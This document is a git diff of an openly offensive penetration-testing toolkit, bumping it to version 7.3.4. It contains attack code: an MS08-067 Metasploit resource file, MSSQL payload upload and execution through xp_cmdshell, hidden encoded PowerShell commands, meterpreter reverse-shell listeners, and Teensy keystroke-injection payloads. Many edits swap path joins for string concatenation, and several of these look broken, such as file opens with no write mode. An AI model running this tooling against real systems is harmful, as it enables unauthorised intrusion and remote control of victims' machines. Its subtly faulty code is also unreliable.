diff --git a/modules/ratte_only_module.py b/modules/ratte_only_module.py index 5c0a3f221..ddde53cb9 100755 --- a/modules/ratte_only_module.py +++ b/modules/ratte_only_module.py @@ -40,7 +40,7 @@ def prepare_ratte(ipaddr, ratteport, persistent, customexe): ############ # PATCH Server IP into RATTE ############ - with open(os.path.join(core.setdir, "ratteM.exe"), "wb") as filewrite: + with open(os.path.join(core.setdir + "ratteM.exe"), "wb") as filewrite: host = (len(ipaddr) + 1) * "X" r_port = (len(str(ratteport)) + 1) * "Y" @@ -126,7 +126,7 @@ def main(): ############ prepare_ratte(ipaddr, ratteport, persistent, customexe) - core.print_status("Payload has been exported to %s" % os.path.join(core.setdir, "ratteM.exe")) + core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe")) ################### # start ratteserver diff --git a/readme/CHANGELOG b/readme/CHANGELOG index 120cad572..142ed749b 100644 --- a/readme/CHANGELOG +++ b/readme/CHANGELOG @@ -1,3 +1,12 @@ +~~~~~~~~~~~~~~~~ +version 7.3.4 +~~~~~~~~~~~~~~~~ + +* fixed an issue with mssql bruter that would cause it to fail over to nmap scans even if host wasn't valid +* fixed an issue that would cause UDP to not work properly when scanning subnet ranges +* improved handling and descriptions in mssql +* fixed error in mssql bruter + ~~~~~~~~~~~~~~~~ version 7.3.3 ~~~~~~~~~~~~~~~~ diff --git a/seproxy b/seproxy index 640ddea36..2217d5851 100755 --- a/seproxy +++ b/seproxy @@ -45,7 +45,7 @@ if operating_system == "posix": else: proxy_string = "export http_proxy='http://{0}'".format(proxy) - with open(os.path.join(core.setdir, "/proxy.config"), "w") as filewrite: + with open(os.path.join(core.setdir + "/proxy.config"), "w") as filewrite: filewrite.write(proxy_string) def kill_proc(port, flag): diff --git a/src/core/fasttrack.py b/src/core/fasttrack.py index 0dc3ce3b0..d03a20e9b 100644 --- a/src/core/fasttrack.py +++ b/src/core/fasttrack.py @@ -97,11 +97,14 @@ try: iprange = iprange.split(",") for host in iprange: sqlport = get_sql_port(host) + if sqlport != None: print_status("Found SQL port on IP Address: %s and on port: %s" % (host, sqlport)) if sqlport == None: - sql_nmap_scan(host) - if sql_nmap_scan != None: + nmapscan = sql_nmap_scan(host) + if nmapscan != "": sql_servers = sql_servers + \ host + ":" + "1433" + "," + print_status("Found a SQL port on IP Address: %s and on port: 1433" % (host)) + if nmapscan == "": print_warning("Unable to find a SQL server on IP: %s" % (host)) if sqlport != None: sql_servers = sql_servers + \ host + ":" + sqlport + "," diff --git a/src/core/set.version b/src/core/set.version index 44e98ada9..c968a5762 100644 --- a/src/core/set.version +++ b/src/core/set.version @@ -1 +1 @@ -7.3.3 +7.3.4 diff --git a/src/core/setcore.py b/src/core/setcore.py index cea3d62a3..be1c0a750 100644 --- a/src/core/setcore.py +++ b/src/core/setcore.py @@ -1662,7 +1662,7 @@ def start_dns(): def setdir(): if check_os() == "posix": - return os.path.join(os.path.expanduser('~'), '.set') + return os.path.join(os.path.expanduser('~'), '.set' + '/') if check_os() == "windows": return "src/program_junk/" diff --git a/src/fasttrack/autopwn.py b/src/fasttrack/autopwn.py index 905482ba2..e20e24255 100644 --- a/src/fasttrack/autopwn.py +++ b/src/fasttrack/autopwn.py @@ -44,8 +44,8 @@ def launch(): core.print_status("Launching Metasploit and attacking the systems specified. This may take a moment..") # try/catch block try: - child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path, 'msfconsole'), - os.path.join(core.setdir, "autopwn.answer"))) + child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path + 'msfconsole'), + os.path.join(core.setdir + "autopwn.answer"))) child.interact() # handle exceptions and log them diff --git a/src/fasttrack/exploits/ms08067.py b/src/fasttrack/exploits/ms08067.py index 1a9bbb45c..8e8bd00b3 100644 --- a/src/fasttrack/exploits/ms08067.py +++ b/src/fasttrack/exploits/ms08067.py @@ -17,7 +17,7 @@ except NameError: def create_rc(revhost, victim, payload, port): - with open("/root/.set/ms08-067.rc", "w") as filewrite: + with open("/root/.set/ms08-067.rc" + "w") as filewrite: filewrite.write("use exploit/windows/smb/ms08_067_netapi\n" "set payload {0}\n" "set RHOST {1}\n" diff --git a/src/fasttrack/mssql.py b/src/fasttrack/mssql.py index b18e2e20e..c3b942583 100644 --- a/src/fasttrack/mssql.py +++ b/src/fasttrack/mssql.py @@ -96,6 +96,7 @@ def brute(ipaddr, username, port, wordlist): def deploy_hex2binary(ipaddr, port, username, password): # base variable used to select payload option option = None + choice1 = "1" conn = _mssql.connect("{0}:{1}".format(ipaddr, port), username, @@ -152,6 +153,7 @@ def deploy_hex2binary(ipaddr, port, username, password): choice1 = input("1.) Use Metasploit (default)\n" "2.) Select your own\n\n" "Enter your choice[1]:") + if choice1 == "": choice1 = "1" @@ -177,8 +179,8 @@ def deploy_hex2binary(ipaddr, port, username, password): # if we are using a SET interactive shell payload then we need to make # the path under web_clone versus ~./set - if os.path.isfile(os.path.join(core.setdir, "set.payload")): - web_path = os.path.join(core.setdir, "web_clone") + if os.path.isfile(os.path.join(core.setdir + "set.payload")): + web_path = os.path.join(core.setdir + "web_clone") # then we are using metasploit else: if operating_system == "posix": @@ -187,12 +189,12 @@ def deploy_hex2binary(ipaddr, port, username, password): if not os.path.isfile(core.setdir + "1msf.exe"): # move it then subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % - (core.setdir, core.setdir), shell=True).wait() + (core.setdir + core.setdir), shell=True).wait() subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % - (core.setdir, core.setdir), shell=True).wait() + (core.setdir + core.setdir), shell=True).wait() subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % - (core.setdir, core.setdir), shell=True).wait() - payload_filename = os.path.join(web_path, "1msf.exe") + (core.setdir + core.setdir), shell=True).wait() + payload_filename = os.path.join(web_path + "1msf.exe") with open(payload_filename, "rb") as fileopen: # read in the binary @@ -201,12 +203,12 @@ def deploy_hex2binary(ipaddr, port, username, password): data = binascii.hexlify(data) # we write out binary out to a file - with open(os.path.join(core.setdir, "payload.hex"), "w") as filewrite: + with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite: filewrite.write(data) if choice1 == "1": # if we are using metasploit, start the listener - if not os.path.isfile(os.path.join(core.setdir, "set.payload")): + if not os.path.isfile(os.path.join(core.setdir + "set.payload")): if operating_system == "posix": try: core.module_reload(pexpect) @@ -214,8 +216,8 @@ def deploy_hex2binary(ipaddr, port, username, password): import pexpect core.print_status("Starting the Metasploit listener...") msf_path = core.meta_path() - child2 = pexpect.spawn("{0}-r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"), - os.path.join(core.setdir, "meta_config"))) + child2 = pexpect.spawn("{0}-r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"), + os.path.join(core.setdir + "meta_config"))) # random executable name random_exe = core.generate_random_string(10, 15) @@ -239,7 +241,7 @@ def deploy_hex2binary(ipaddr, port, username, password): core.update_options("POWERSHELL_SOLO=ON") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") - with open(os.path.join(core.setdir, "/payload_options.shellcode"), "w") as filewrite: + with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite.write("windows/meterpreter/reverse_https {0},".format(port)) @@ -249,23 +251,23 @@ def deploy_hex2binary(ipaddr, port, username, password): import src.payloads.powershell.prep # create the directory if it does not exist - if not os.path.isdir(os.path.join(core.setdir, "reports/powershell")): - os.makedirs(os.path.join(core.setdir, "reports/powershell")) + if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): + os.makedirs(os.path.join(core.setdir + "reports/powershell")) - with open(os.path.join(core.setdir, "x86.powershell")) as x86: + with open(os.path.join(core.setdir + "x86.powershell")) as x86: x86 = x86.read() x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) core.print_status("If you want the powershell commands and attack, " - "they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell"))) - with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite: + "they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell"))) + with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite: filewrite.write(x86) # if our payload is x86 based - need to prep msfconsole rc if payload == "x86": powershell_command = x86 # powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt" - with open(os.path.join(core.setdir, "reports/powershell/powershell.rc"), "w") as filewrite: + with open(os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite: filewrite.write("use multi/handler\n" "set payload windows/meterpreter/reverse_https\n" "set lport {0}\n" @@ -284,8 +286,8 @@ def deploy_hex2binary(ipaddr, port, username, password): import pexpect core.print_status("Starting the Metasploit listener...") - child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"), - os.path.join(core.setdir, "reports/powershell/powershell.rc"))) + child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"), + os.path.join(core.setdir + "reports/powershell/powershell.rc"))) core.print_status("Waiting for the listener to start first before we continue forward...") core.print_status("Be patient, Metaploit takes a little bit to start...") child2.expect("Starting the payload handler", timeout=30000) @@ -304,7 +306,7 @@ def deploy_hex2binary(ipaddr, port, username, password): # here we start the conversion and execute the payload core.print_status("Sending the main payload via to be converted back to a binary.") # read in the file 900 bytes at a time - with open(os.path.join(core.setdir, 'payload.hex')) as fileopen: + with open(os.path.join(core.setdir + 'payload.hex')) as fileopen: core.print_status("Dropping initial begin certificate header...") conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe)) for data in fileopen.read(900).rstrip(): @@ -325,10 +327,10 @@ def deploy_hex2binary(ipaddr, port, username, password): conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe)) # if we are using SET payload if choice1 == "1": - if os.path.isfile(os.path.join(core.setdir, "set.payload")): + if os.path.isfile(os.path.join(core.setdir + "set.payload")): core.print_status("Spawning separate child process for listener...") try: - shutil.copyfile(os.path.join(core.setdir, "web_clone/x"), definepath) + shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath) except: pass @@ -361,8 +363,8 @@ def deploy_hex2binary(ipaddr, port, username, password): if option == "2": core.print_status("Triggering payload stager...") alphainject = "" - if os.path.isfile(os.path.join(core.setdir, "meterpreter.alpha")): - with open(os.path.join(core.setdir, "meterpreter.alpha")) as fileopen: + if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")): + with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen: alphainject = fileopen.read() sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject)) @@ -370,9 +372,9 @@ def deploy_hex2binary(ipaddr, port, username, password): thread.start_new_thread(conn.execute_query, (sql_command,)) time.sleep(1) - # if pexpect doesnt exit right then it freaks out + # if pexpect doesnt exit right then it freaks out if choice1 == "1": - if os.path.isfile(os.path.join(core.setdir, "set.payload")): + if os.path.isfile(os.path.join(core.setdir + "set.payload")): os.system("python ../../payloads/set_payloads/listener.py") try: # interact with the child process through pexpect diff --git a/src/fasttrack/psexec.py b/src/fasttrack/psexec.py index 08a6e7074..4b2271c3d 100644 --- a/src/fasttrack/psexec.py +++ b/src/fasttrack/psexec.py @@ -68,7 +68,7 @@ try: if port == "": port = "443" core.update_options("PORT={0}".format(port)) - with open(os.path.join(core.setdir, "/payload_options.shellcode"), "w") as filewrite: + with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite.write("{0} {1},".format(payload, port)) core.update_options("POWERSHELL_SOLO=ON") @@ -80,14 +80,14 @@ try: import src.payloads.powershell.prep # create the directory if it does not exist - if not os.path.isdir(os.path.join(core.setdir, "reports/powershell")): - os.makedirs(os.path.join(core.setdir, "reports/powershell")) + if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): + os.makedirs(os.path.join(core.setdir + "reports/powershell")) - with open(os.path.join(core.setdir, "x86.powershell")) as fileopen: + with open(os.path.join(core.setdir + "x86.powershell")) as fileopen: x86 = fileopen.read() x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) - core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell"))) - with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite: + core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell"))) + with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite: filewrite.write(x86) payload = "windows/meterpreter/reverse_https\n" # if we are using x86 command = x86 # assign powershell to command @@ -113,8 +113,8 @@ try: # launch metasploit below core.print_status("Launching Metasploit.. This may take a few seconds.") - subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path(), "msfconsole"), - os.path.join(core.setdir, "reports/powershell/powershell.rc")), + subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path() + "msfconsole"), + os.path.join(core.setdir + "reports/powershell/powershell.rc")), shell=True).wait() # handle exceptions diff --git a/src/fasttrack/sccm/sccm_main.py b/src/fasttrack/sccm/sccm_main.py index 8cc8eb0ea..0a7a32d0d 100644 --- a/src/fasttrack/sccm/sccm_main.py +++ b/src/fasttrack/sccm/sccm_main.py @@ -48,7 +48,7 @@ Next '''.format(sms_server, package_id) # write out the file to reports -with open(os.path.join(core.setdir, "reports/sccm_configuration.txt"), 'w') as filewrite: +with open(os.path.join(core.setdir + "reports/sccm_configuration.txt"), 'w') as filewrite: filewrite.write(configuration) core.print_status("The SCCM configuration script has been successfully created.") core.print_status("You need to copy the script to the startup folder of the server.") diff --git a/src/teensy/binary2teensy.py b/src/teensy/binary2teensy.py index 290cb3772..d532c067b 100644 --- a/src/teensy/binary2teensy.py +++ b/src/teensy/binary2teensy.py @@ -246,7 +246,7 @@ except KeyboardInterrupt: print(" [*] Generating alpha_mixed shellcode to be injected after shellexec has been deployed on victim...") # grab msfvenom alphanumeric shellcode to be inserted into shellexec -proc = subprocess.Popen("{0} -p {1} EXITFUNC=thread LHOST={2} LPORT={3} {4} --format raw -e x86/alpha_mixed BufferRegister=EAX".format(os.path.join(core.meta_path(), "msfvenom"), +proc = subprocess.Popen("{0} -p {1} EXITFUNC=thread LHOST={2} LPORT={3} {4} --format raw -e x86/alpha_mixed BufferRegister=EAX".format(os.path.join(core.meta_path() + "msfvenom"), payload, ipaddr, port, @@ -440,15 +440,15 @@ Keyboard.send_now(); }}""".format(random_filename=random_filename, powershell_command=powershell_command, vbs=vbs, bat=bat, alpha_payload=alpha_payload)) # delete temporary file subprocess.Popen("rm {0} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait() -print(" [*] Binary to Teensy file exported as {0}".format(os.path.join(core.setdir, "/reports/binary2teensy.pde"))) +print(" [*] Binary to Teensy file exported as {0}".format(os.path.join(core.setdir + "/reports/binary2teensy.pde"))) # write the teensy.pde file out -with open(os.path.join(core.setdir, "/reports/binary2teensy.pde"), 'w') as filewrite: +with open(os.path.join(core.setdir + "/reports/binary2teensy.pde"), 'w') as filewrite: # write the teensy.pde file out filewrite.write(output_variable) print(" [*] Generating a listener...") # create our metasploit answer file -with open(os.path.join(core.setdir, "answer.txt", "w")) as filewrite: +with open(os.path.join(core.setdir + "answer.txt", "w")) as filewrite: filewrite.write("use multi/handler\n" "set payload {0}\n" "set LHOST {1}\n" @@ -456,9 +456,9 @@ with open(os.path.join(core.setdir, "answer.txt", "w")) as filewrite: "{3}\n" "exploit -j".format(payload, ipaddr, port, url)) # spawn a multi/handler listener -subprocess.Popen("msfconsole -r {0}".format(os.path.join(core.setdir, "answer.txt")), shell=True).wait() +subprocess.Popen("msfconsole -r {0}".format(os.path.join(core.setdir + "answer.txt")), shell=True).wait() print(" [*] Housekeeping old files...") # if our answer file is still there (which it should be), then remove it -if os.path.isfile(os.path.join(core.setdir, "answer.txt")): +if os.path.isfile(os.path.join(core.setdir + "answer.txt")): # remove the old file, no longer used once we've exited - subprocess.Popen(os.path.join(core.setdir, "answer.txt"), shell=True).wait() + subprocess.Popen(os.path.join(core.setdir + "answer.txt"), shell=True).wait() diff --git a/src/teensy/powershell_shellcode.py b/src/teensy/powershell_shellcode.py index bab76f08b..5fa486308 100644 --- a/src/teensy/powershell_shellcode.py +++ b/src/teensy/powershell_shellcode.py @@ -24,18 +24,18 @@ This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/ payload = "windows/meterpreter/reverse_tcp" # create base metasploit payload to pass to powershell.prep -with open(os.path.join(core.setdir, "metasploit.payload"), 'w') as filewrite: +with open(os.path.join(core.setdir + "metasploit.payload"), 'w') as filewrite: filewrite.write(payload) ipaddr = input("Enter the IP for the reverse: ") port = input("Enter the port for the reverse: ") shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "") -with open(os.path.join(core.setdir, 'x86.powershell', 'w')) as filewrite: +with open(os.path.join(core.setdir + 'x86.powershell', 'w')) as filewrite: filewrite.write(shellcode) time.sleep(3) -with open(os.path.join(core.setdir, "x86.powershell")) as fileopen: +with open(os.path.join(core.setdir + "x86.powershell")) as fileopen: pass # read in x amount of bytes data_read = int(50) @@ -149,10 +149,10 @@ Keyboard.set_key1(0); Keyboard.send_now(); } """) -print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir, "reports/teensy.pde"))) -if not os.path.isdir(os.path.join(core.setdir, "reports")): - os.makedirs(os.path.join(core.setdir, "reports")) -with open(os.path.join(core.setdir, "/reports/teensy.pde", "w")) as filewrite: +print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir + "reports/teensy.pde"))) +if not os.path.isdir(os.path.join(core.setdir + "reports")): + os.makedirs(os.path.join(core.setdir + "reports")) +with open(os.path.join(core.setdir + "/reports/teensy.pde", "w")) as filewrite: filewrite.write(teensy) choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]: ") if choice == "YES": @@ -170,7 +170,7 @@ if choice == "YES": else: port = input("Enter the port to connect back on: ") - with open(os.path.join(core.setdir, "/metasploit.answers", "w")) as filewrite: + with open(os.path.join(core.setdir + "/metasploit.answers", "w")) as filewrite: filewrite.write("use multi/handler\n" "set payload {0}\n" "set LHOST {1}\n" @@ -180,8 +180,8 @@ if choice == "YES": print("[*] Launching Metasploit....") try: - child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"), - os.path.join(core.setdir, "metasploit.answers"))) + child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"), + os.path.join(core.setdir + "metasploit.answers"))) child.interact() except: pass diff --git a/src/teensy/teensy.py b/src/teensy/teensy.py index 43d010788..dcf70711e 100644 --- a/src/teensy/teensy.py +++ b/src/teensy/teensy.py @@ -30,8 +30,8 @@ if operating_system != "windows": import pexpect # check to see if setdir is created -if not os.path.isdir(os.path.join(core.setdir, "reports")): - os.makedirs(os.path.join(core.setdir, "reports")) +if not os.path.isdir(os.path.join(core.setdir + "reports")): + os.makedirs(os.path.join(core.setdir + "reports")) definepath = os.getcwd() # define if use apache or not @@ -57,7 +57,7 @@ for line in apache_check: # grab info from config file -with open(os.path.join(core.setdir, "teensy")) as fileopen: +with open(os.path.join(core.setdir + "teensy")) as fileopen: counter = 0 payload_counter = 0 choice = None @@ -77,14 +77,14 @@ with open(os.path.join(core.setdir, "teensy")) as fileopen: ipaddr = input(core.setprompt(["6"], "IP address to connect back on")) core.update_options("IPADDR=" + ipaddr) - if not os.path.isfile(os.path.join(core.setdir, "teensy")): + if not os.path.isfile(os.path.join(core.setdir + "teensy")): core.print_error("FATAL:Something went wrong, the Teensy config file was not created.") core.exit_set() def writefile(filename, now): - with open(os.path.join("src/teensy", filename)) as fileopen, \ - open(os.path.join(core.setdir, "/reports/teensy_{0}.pde".format(now)), "w") as filewrite: + with open(os.path.join("src/teensy" + filename)) as fileopen, \ + open(os.path.join(core.setdir + "/reports/teensy_{0}.pde".format(now)), "w") as filewrite: for line in fileopen: match = re.search("IPADDR", line) @@ -128,8 +128,8 @@ if choice == "13": # save our stuff here print(core.bcolors.BLUE + - "\n[*] PDE file created. You can get it under '{0}'".format(os.path.join(core.setdir, - "reports", + "\n[*] PDE file created. You can get it under '{0}'".format(os.path.join(core.setdir + + "reports" + "teensy_{0}.pde".format(now))) + core.bcolors.ENDC) print(core.bcolors.GREEN + @@ -142,29 +142,29 @@ print(core.bcolors.RED + pause = input("Press {return} to continue.") if payload_counter == 1: - webclone_path = os.path.join(core.setdir, "web_clone") - metasploit_exec_path = os.path.join(core.setdir, "msf.exe") + webclone_path = os.path.join(core.setdir + "web_clone") + metasploit_exec_path = os.path.join(core.setdir + "msf.exe") if not apache: subprocess.Popen("mkdir {0};" - "cp {1} {2} 1> /dev/null 2> /dev/null".format(webclone_path, - metasploit_exec_path, - os.path.join(webclone_path, "x.exe")), + "cp {1} {2} 1> /dev/null 2> /dev/null".format(webclone_path + + metasploit_exec_path + + os.path.join(webclone_path + "x.exe")), shell=True).wait() if operating_system != "windows": child = pexpect.spawn("python src/html/web_server.py") else: - subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path, "x.exe")), shell=True).wait() + subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path + "x.exe")), shell=True).wait() - if os.path.isfile(os.path.join(core.setdir, "meta_config")): + if os.path.isfile(os.path.join(core.setdir + "meta_config")): print(core.bcolors.BLUE + "\n[*] Launching MSF Listener...") print(core.bcolors.BLUE + "[*] This may take a few to load MSF..." + core.bcolors.ENDC) try: if operating_system != "windows": - child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path, "msfconsole"), - os.path.join(core.setdir, "meta_config"))) + child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path + "msfconsole"), + os.path.join(core.setdir + "meta_config"))) child1.interact() except: if operating_system != "windows": diff --git a/src/wireless/wifiattack.py b/src/wireless/wifiattack.py index 4cab12e93..910121495 100644 --- a/src/wireless/wifiattack.py +++ b/src/wireless/wifiattack.py @@ -89,14 +89,14 @@ else: if fakeap_dhcp_menu_choice == "1": # writes the dhcp server out core.print_status("Writing the dhcp configuration file to ~/.set") - with open(os.path.join(core.setdir, "dhcp.conf"), "w") as filewrite: + with open(os.path.join(core.setdir + "dhcp.conf"), "w") as filewrite: filewrite.write(dhcp_config1) dhcptun = 1 if fakeap_dhcp_menu_choice == "2": # writes the dhcp server out core.print_status("Writing the dhcp configuration file to ~/.set") - with open(os.path.join(core.setdir, "dhcp.conf"), "w") as filewrite: + with open(os.path.join(core.setdir + "dhcp.conf"), "w") as filewrite: filewrite.write(dhcp_config2) dhcptun = 2